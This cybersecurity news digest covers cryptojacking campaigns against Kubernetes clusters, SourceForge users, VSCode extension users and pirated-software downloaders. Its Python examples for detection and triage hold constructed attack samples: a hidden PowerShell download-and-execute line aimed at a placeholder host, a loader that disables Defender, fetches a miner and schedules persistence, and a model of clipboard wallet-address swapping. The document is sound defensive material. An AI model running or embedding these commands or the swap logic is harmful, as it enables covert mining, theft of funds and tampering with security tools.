CyberSecurity news

FlagThis - #cryptojacking

@www.microsoft.com //
Microsoft Threat Intelligence reports a significant rise in attacks on poorly secured Kubernetes clusters, mostly for illicit cryptocurrency mining. The actors abuse weaknesses such as unsecured workload identities and dormant accounts to get into containerized environments. Microsoft's own data shows that 51% of workload identities were completely inactive over the past year, each one a potential entry point that nobody is watching. Growing adoption of containers-as-a-service has widened the attack surface and made these environments more attractive to criminals looking to profit from stolen compute.

The dynamic nature of Kubernetes makes life hard for defenders: containers are deployed and scaled so quickly that runtime anomalies are easy to miss and the origin of a breach is hard to trace. Attackers get in through misconfigured resources, outdated container images, weak network segmentation and overly permissive access controls. Observed vectors include compromised cloud credentials, malicious container images, abuse of the Kubernetes API, node-level and pod-escape attacks, and injection of unauthorized network traffic. In one recent case, the AzureChecker.exe tool was used to password-spray cloud tenants; with the credentials obtained, the actor deployed cryptomining containers into resource groups in the compromised tenant.

To help organizations keep up, Microsoft has been working with MITRE to update the Kubernetes threat matrix and the ATT&CK for Containers matrix, giving defenders a structured way to enumerate and mitigate the attack surface of containerized environments. The recommended controls are the familiar ones: immutable container policies (read-only root filesystems, no runtime package installs), strong authentication, rigorous vulnerability management, admission controllers that enforce policy at deploy time, image assurance policies (signed images from approved registries only), and continuous monitoring of API activity. In a separate case of container-based monetization, a Docker malware campaign was found running a fake Teneo Web3 node that sends bogus heartbeat signals to earn the project's crypto rewards without doing any real work, a reminder that compromised container infrastructure is monetized in more ways than mining.
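The admission-controller, image-assurance, immutable-container and API-monitoring recommendations above are easiest to understand as policy applied to a pod spec. The following is an added example, not code from Microsoft's report or from the MITRE matrices: a small policy evaluator that rejects pods with unapproved or unpinned images, privileged or host-namespace settings and writable root filesystems, then replays the same checks over constructed Kubernetes audit-log records to flag pod creations that should never have been admitted. The registry name `registry.example.internal`, the usernames and the audit events are all made up.

```python
"""Admission-style policy checks for Kubernetes pod specs, run over constructed
audit-log records. Added example, not code from Microsoft's report or the MITRE
matrices; the registry name, users and events below are made up."""
from __future__ import annotations

# Assumption: only images from this internal registry are approved.
ALLOWED_REGISTRIES = ("registry.example.internal/",)


def image_registry(image: str) -> str:
    """Registry prefix of an image reference; bare names resolve to docker.io/."""
    first = image.split("/", 1)[0]
    if "/" in image and ("." in first or ":" in first or first == "localhost"):
        return first + "/"
    return "docker.io/"


def evaluate_pod(pod: dict) -> list[str]:
    """Return policy violations for a pod manifest; an empty list means 'admit'."""
    violations: list[str] = []
    spec = pod.get("spec", {})
    if any(spec.get(k) for k in ("hostPID", "hostNetwork", "hostIPC")):
        violations.append("pod shares a host namespace (hostPID/hostNetwork/hostIPC)")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name, image = c.get("name", "?"), c.get("image", "")
        sc = c.get("securityContext") or {}
        if not image.startswith(ALLOWED_REGISTRIES):
            violations.append(f"{name}: image from unapproved registry {image_registry(image)}")
        if "@sha256:" not in image:
            violations.append(f"{name}: image not pinned by digest")
        if sc.get("privileged"):
            violations.append(f"{name}: privileged container")
        if sc.get("allowPrivilegeEscalation", True):
            violations.append(f"{name}: allowPrivilegeEscalation not disabled")
        if not sc.get("readOnlyRootFilesystem"):
            violations.append(f"{name}: writable root filesystem (immutable-container policy)")
    return violations


def flag_audit_events(events: list[dict]) -> list[dict]:
    """Scan audit records for pod creations that would have failed admission.

    Records follow the shape of the audit.k8s.io Event: verb, user.username,
    objectRef.resource/namespace and the requestObject (the submitted pod)."""
    findings = []
    for ev in events:
        if ev.get("verb") != "create" or ev.get("objectRef", {}).get("resource") != "pods":
            continue
        violations = evaluate_pod(ev.get("requestObject", {}))
        if violations:
            findings.append({"user": ev["user"]["username"],
                             "namespace": ev["objectRef"].get("namespace"),
                             "violations": violations})
    return findings


# Constructed sample manifests and audit records (not real telemetry).
BENIGN_POD = {"spec": {"containers": [{
    "name": "api",
    "image": "registry.example.internal/shop/api@sha256:" + "a" * 64,
    "securityContext": {"readOnlyRootFilesystem": True, "allowPrivilegeEscalation": False},
}]}}

SUSPECT_POD = {"spec": {"hostPID": True, "containers": [{
    "name": "worker",
    "image": "docker.io/someuser/worker:latest",
    "securityContext": {"privileged": True},
}]}}

AUDIT_EVENTS = [
    {"verb": "create", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "pods", "namespace": "shop"}, "requestObject": BENIGN_POD},
    {"verb": "get", "user": {"username": "alice@example.com"},
     "objectRef": {"resource": "pods", "namespace": "shop"}},
    {"verb": "create", "user": {"username": "guest-user@example.com"},
     "objectRef": {"resource": "pods", "namespace": "default"}, "requestObject": SUSPECT_POD},
]

if __name__ == "__main__":
    for f in flag_audit_events(AUDIT_EVENTS):
        print(f["user"], f["namespace"], *f["violations"], sep="\n  ")
```

In a real cluster these checks belong in a validating admission webhook or a ValidatingAdmissionPolicy so that the pod is never created; the pass over audit logs is the second line of defense, and it also catches workloads created before the policy existed or by identities that bypass it.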

Recommended read:
References :
  • www.microsoft.com: Understanding the threat landscape for Kubernetes and containerized assets
  • Cyberpress: Unsecured Kubernetes Clusters Targeted by Threat Actors for Crypto Mining
  • The Hacker News: Docker Malware Exploits Teneo Web3 Node to Earn Crypto via Fake Heartbeat Signals

@gbhackers.com //
Cybercriminals are abusing SourceForge, a legitimate software hosting and distribution platform, to spread malware disguised as Microsoft Office add-ins. They use SourceForge's project subdomains to create fake project pages that look credible and so are more likely to be trusted. One such project, "officepackage", hosts Office add-ins copied from a legitimate GitHub project, but its subdomain "officepackage.sourceforge[.]io" shows a list of Office applications with download links that lead to malware. The campaign mainly targets Russian-speaking users.

The attackers also manipulate search engine rankings so the fake pages appear prominently when users search for Office add-ins. The download button redirects through a chain of intermediary sites before delivering a suspicious 7 MB archive named "vinstaller.zip". Inside is a second, password-protected archive, "installer.zip", together with a text file containing its password (password-protecting the inner archive is a common trick to keep scanners from inspecting the payload).

The second archive contains an MSI installer that drops several files and runs embedded scripts. A Visual Basic script downloads and executes a batch file, which unpacks the final payloads: a cryptocurrency miner and the ClipBanker Trojan. ClipBanker is a clipper: it watches the clipboard for copied cryptocurrency wallet addresses and replaces them with attacker-controlled ones, so victims unknowingly send funds to the attackers. Telemetry shows that 90% of potential victims are in Russia, with 4,604 users having encountered the campaign.

Recommended read:
References :
  • cyberpress.org: Threat Actors Leverage SourceForge Platform to Spread Malware
  • gbhackers.com: Attackers Exploit SourceForge Platform to Distribute Malware
  • Securelist: Attackers distributing a miner and the ClipBanker Trojan via SourceForge
  • The Hacker News: Cryptocurrency Miner and Clipper Malware Spread via SourceForge
  • Cyber Security News: Threat Actors Leverage SourceForge Platform to Spread Malware
  • BleepingComputer: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • The DefendOps Diaries: Unmasking the SourceForge Malware Campaign: A Deceptive Attack on Users
  • bsky.app: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • securityonline.info: SourceForge Used to Distribute ClipBanker Trojan and Cryptocurrency Miner
  • Tech Monitor: Threat actors exploit SourceForge to spread fake Microsoft add-ins

@blog.extensiontotal.com //
Multiple malicious Visual Studio Code (VSCode) extensions have been identified on the Microsoft VSCode Marketplace, posing a significant threat to developers. Discovered on April 4, 2025, they masquerade as legitimate development tools, with names such as "Discord Rich Presence" and "Rojo – Roblox Studio Sync", and work by surreptitiously downloading and executing a PowerShell script. That script disables Windows security features, establishes persistence through a scheduled task, and installs the XMRig cryptominer (reported to mine Ethereum and Monero), all without the user's knowledge.

The attack is multi-stage. Once installed, the extension downloads a PowerShell loader from a remote command-and-control (C2) server; the loader disables security services to evade detection and then deploys XMRig to burn the victim's CPU on cryptocurrency mining. Notably, the attackers also install legitimate versions of the extensions they impersonate, so the advertised functionality actually works and the user has no reason to suspect anything. Researchers at ExtensionTotal, who uncovered the extensions, noted that many had artificially inflated install counts to make them look established and trustworthy.

The incident underscores the growing threat of supply chain attacks on development environments. By publishing malicious extensions to the VSCode Marketplace, attackers can reach a large population of developers whose machines typically hold source code and credentials. That these extensions passed Microsoft's marketplace review raises questions about how much protection that review provides. Developers should treat extensions like any other third-party code: check the publisher's identity and history, be wary of new extensions with implausibly high install counts, review what the extension actually does where possible, and, if one of the named extensions was installed, remove it and check for the scheduled task and the disabled security settings it leaves behind.
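A developer or marketplace reviewer can triage an extension before installing it by unpacking the .vsix (a zip archive) and looking at what its activation code does. Below is an added example of such a static triage, not tooling from ExtensionTotal or Microsoft: it checks package.json for extensions that activate on every startup and scans the bundled JavaScript and any dropped scripts for the behaviours described in the reports (spawning PowerShell, download-and-execute one-liners, Defender tampering, scheduled-task persistence, a known miner name). The indicator list, weights and thresholds are this example's own; the two sample extensions, the dropped loader script and the `loader.example.invalid` URL are constructed.

```python
"""Static triage of VS Code extension packages. Added example, not code from
ExtensionTotal or Microsoft; indicators, weights and thresholds are this
example's own, and the sample extensions, loader script and URL are constructed."""
from __future__ import annotations
import json
import re

# (finding label, weight, regex applied to JS/TS sources and dropped scripts)
INDICATORS = [
    ("spawns a child process", 2, re.compile(r"child_process|\bexec(Sync)?\b|\bspawn(Sync)?\b")),
    ("invokes PowerShell", 3, re.compile(r"powershell(\.exe)?", re.I)),
    ("hidden window / policy bypass flags", 2,
     re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded command", 3, re.compile(r"-e(nc|ncodedcommand)\b", re.I)),
    ("download-and-execute", 4,
     re.compile(r"(iwr|Invoke-WebRequest|curl|wget)[^\n|]*\|\s*(iex|Invoke-Expression)", re.I)),
    ("disables Defender / adds exclusions", 4, re.compile(r"(Set|Add)-MpPreference", re.I)),
    ("scheduled-task persistence", 3, re.compile(r"schtasks|Register-ScheduledTask", re.I)),
    ("known miner name", 5, re.compile(r"xmrig", re.I)),
    ("installs another extension", 1, re.compile(r"--install-extension")),
]

SCRIPT_SUFFIXES = (".js", ".ts", ".ps1", ".cmd", ".bat")


def triage_extension(files: dict[str, str]) -> dict:
    """files maps relative path -> content of an unpacked .vsix (or any drop).
    Returns publisher, findings and a risk score; the verdict is a heuristic."""
    manifest = json.loads(files.get("package.json", "{}"))
    findings: list[str] = []
    score = 0
    events = manifest.get("activationEvents", [])
    if "*" in events or "onStartupFinished" in events:
        findings.append("activates on every startup")
        score += 1
    source = "\n".join(v for k, v in files.items() if k.endswith(SCRIPT_SUFFIXES))
    for label, weight, rx in INDICATORS:
        if rx.search(source):
            findings.append(label)
            score += weight
    return {"publisher": manifest.get("publisher", "<missing>"),
            "name": manifest.get("name", "<missing>"),
            "score": score, "findings": findings,
            "verdict": "high" if score >= 8 else "review" if score >= 3 else "low"}


# Constructed sample: a harmless extension that only registers a command.
BENIGN_EXTENSION = {
    "package.json": json.dumps({"name": "hello-status", "publisher": "example-dev",
                                "activationEvents": ["onCommand:hello.show"],
                                "main": "./out/extension.js"}),
    "out/extension.js": """const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand('hello.show',
    () => vscode.window.showInformationMessage('hi')));
}
module.exports = { activate };
""",
}

# Constructed sample modelled on the reported behaviour: activates on startup,
# runs a hidden PowerShell download-and-execute, then installs the real extension.
MALICIOUS_EXTENSION = {
    "package.json": json.dumps({"name": "discord-rich-presence-sync", "publisher": "unknown-pub",
                                "activationEvents": ["*"], "main": "./out/extension.js"}),
    "out/extension.js": """const { execSync } = require('child_process');
function activate() {
  // Constructed loader; the URL is a placeholder, not a real C2.
  const cmd = 'powershell.exe -w hidden -ep bypass -c "iwr http://loader.example.invalid/l.ps1 | iex"';
  execSync(cmd);
  execSync('code --install-extension publisher.real-discord-presence');
}
module.exports = { activate };
""",
}

# Constructed second stage as the reports describe it: Defender off, exclusion
# added, miner fetched, scheduled task for persistence.
DROPPED_LOADER = {"loader.ps1": r"""Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath "$env:APPDATA\svc"
Invoke-WebRequest http://loader.example.invalid/xmrig.zip -OutFile $env:APPDATA\svc\x.zip
schtasks /create /tn "SvcUpdate" /tr "$env:APPDATA\svc\xmrig.exe" /sc onlogon
"""}

if __name__ == "__main__":
    for sample in (BENIGN_EXTENSION, MALICIOUS_EXTENSION, DROPPED_LOADER):
        r = triage_extension(sample)
        print(f"{r['publisher']}/{r['name']}: {r['verdict']} ({r['score']}) {r['findings']}")
```

These are heuristics, not a verdict: plenty of legitimate extensions spawn child processes or shell out to tooling, so a "review" result means read the code, while a clean result means only that none of these particular patterns appeared (an obfuscated or second-stage loader will not match). Publisher identity and history remain the first thing to check.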

Recommended read:
References :
  • blog.extensiontotal.com: reports on a VSCode extension cryptojacking campaign.
  • Secure Bulletin: Malicious VSCode extensions: a growing threat to developers
  • The DefendOps Diaries: Discusses safeguarding VSCode and addressing the threat of malicious extensions.
  • BleepingComputer: Details how malicious VSCode extensions infect Windows with cryptominers.
  • CSO Online: reports on the malicious VSCode extensions.
  • bsky.app: Nine VSCode extensions on Microsoft's Visual Studio Code Marketplace pose as legitimate development tools while infecting users with the XMRig cryptominer to mine Ethereum and Monero.
  • www.scworld.com: Cryptojacking facilitated by nefarious VS Code extensions
  • aboutdfir.com: Malicious VSCode extensions infect Windows with cryptominers
  • securityonline.info: Malicious VSCode Extensions Caught Mining Crypto with XMRig

Pierluigi Paganini@Security Affairs //
Researchers at CyberArk have uncovered a new cryptojacking campaign built around malware they call MassJacker. It targets users who download pirated software, particularly from sites known to distribute malware such as pesktop[.]com. MassJacker is a clipboard hijacker ("clipper"): it monitors the Windows clipboard for copied cryptocurrency wallet addresses.

When a user copies an address, the malware silently replaces it with one controlled by the attackers, so the victim unknowingly sends funds to the wrong recipient; because the pasted address looks like any other, the swap is rarely noticed before the transaction is signed. The investigation tied MassJacker to over 750,000 unique cryptocurrency addresses, one wallet of which held over $300,000.
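Both the ClipBanker payload from the SourceForge campaign above and MassJacker work the same way: watch the clipboard, recognise a wallet address by its format, and overwrite it with an attacker address for the same coin. The following added example, not code from CyberArk's or Kaspersky's analyses, models that substitution and shows the detection heuristic a clipboard poller can apply: a wallet address that turns into a different address of the same asset within a couple of seconds of being copied. All addresses are constructed to fit the formats and are not real wallets; the regexes and the two-second window are this example's own choices.

```python
"""Model of a clipboard hijacker ('clipper') and a polling-based detector for
it. Added example, not code from CyberArk's MassJacker analysis or Kaspersky's
ClipBanker write-up; every address below is constructed to fit the format and
is not a real wallet."""
from __future__ import annotations
import re

# Address formats a clipper typically matches on (regexes are this example's own).
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{25,71}"),
    "ETH": re.compile(r"0x[0-9a-fA-F]{40}"),
    "TRX": re.compile(r"T[1-9A-HJ-NP-Za-km-z]{33}"),
    "XMR": re.compile(r"4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}"),
}

# Constructed wallets: the victim's, and the attacker's for each asset.
USER_BTC, USER_BTC_2 = "1" + "CopyMe" * 5 + "23", "1" + "PayMe" * 6 + "23"
USER_ETH = "0x" + "1234567890abcdef" * 2 + "12345678"
USER_TRX = "T" + "TronUser" * 4 + "1"
ATTACKER_WALLETS = {
    "BTC": "1" + "TakeMe" * 5 + "23",
    "ETH": "0x" + "deadbeef" * 5,
    "TRX": "T" + "TronBad1" * 4 + "1",
}


def classify_address(text: str) -> str | None:
    """Return the asset whose address format the clipboard text matches, else None."""
    text = text.strip()
    for asset, rx in ADDRESS_PATTERNS.items():
        if rx.fullmatch(text):
            return asset
    return None


def hijack_clipboard(text: str, wallets: dict[str, str] = ATTACKER_WALLETS) -> str:
    """What the clipper does on each clipboard change: swap a recognised address
    for the attacker's address of the same asset and leave everything else alone."""
    asset = classify_address(text)
    return wallets.get(asset, text) if asset else text


def simulate_session(copies: list[tuple[float, str]], delay: float = 0.05) -> list[tuple[float, str]]:
    """Clipboard snapshots a poller would see on an infected host: each user copy,
    followed `delay` seconds later by the clipper's rewrite when one happens."""
    snapshots = []
    for t, text in copies:
        snapshots.append((t, text))
        swapped = hijack_clipboard(text)
        if swapped != text:
            snapshots.append((t + delay, swapped))
    return snapshots


def detect_swaps(snapshots: list[tuple[float, str]], max_gap: float = 2.0) -> list[dict]:
    """Flag a wallet address turning into a *different* address of the same asset
    within max_gap seconds. A person rarely copies two addresses of one coin that
    fast; a clipper rewrites the clipboard milliseconds after the copy."""
    alerts = []
    for (t0, before), (t1, after) in zip(snapshots, snapshots[1:]):
        asset = classify_address(before)
        if asset and classify_address(after) == asset and before != after and t1 - t0 <= max_gap:
            alerts.append({"asset": asset, "copied": before, "replaced_with": after,
                           "after_s": round(t1 - t0, 3)})
    return alerts


# Constructed user activity: notes, three wallet addresses, an invoice number.
USER_COPIES = [(0.0, "meeting notes"), (5.0, USER_BTC), (30.0, USER_ETH),
               (60.0, "invoice 4471"), (90.0, USER_TRX), (150.0, USER_BTC_2)]
# A clean host where the user copies two BTC addresses 20 s apart: not a swap.
LEGIT_SNAPSHOTS = [(0.0, USER_BTC), (20.0, USER_BTC_2)]

if __name__ == "__main__":
    for a in detect_swaps(simulate_session(USER_COPIES)):
        print(f"{a['asset']}: {a['copied']} -> {a['replaced_with']} after {a['after_s']}s")
    print("clean host alerts:", detect_swaps(LEGIT_SNAPSHOTS))
```

The same format matching the malware relies on is what makes the detector cheap: a legitimate copy of two different addresses of one coin seconds apart is rare enough that the false-positive rate is acceptable, but the heuristic says nothing about a clipper that waits, or one that only rewrites on paste. The user-side control is unchanged by any of this: compare the first and last few characters of the pasted address against the intended one before signing.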

Recommended read:
References :